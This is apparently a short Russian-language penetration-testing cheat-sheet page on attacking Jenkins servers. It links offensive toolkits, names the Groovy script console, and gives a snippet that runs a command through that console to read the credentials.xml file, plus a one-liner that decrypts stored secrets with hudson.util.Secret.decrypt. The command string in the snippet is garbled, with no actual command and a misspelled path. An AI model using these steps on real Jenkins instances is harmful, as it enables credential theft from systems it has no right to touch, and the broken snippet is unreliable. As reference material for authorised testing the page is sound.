Jenkins
Jenkins: https://github.com/DolosGroup/Jenkins-Pillage
PWN: https://github.com/gquere/pwn_jenkins https://github.com/Accenture/jenkins-attack-framework
Примеры
Консоль
https://host/jenkins/script
Получение зашифрованных паролей
Jenkins хранит учетные данные для различных сервисов, указанных по адресу https://host/jenkins/credentials/, а в файловой системе эти учетные данные хранятся в зашифрованном виде в файле /var/jenkins_home/credentials.xml.
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = ' /var/jenikins_home/credentials.xml'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
Расшифрование паролей
println(hudson.util.Secret.decrypt("{AQAA...BBr}"))
Last updated
Was this helpful?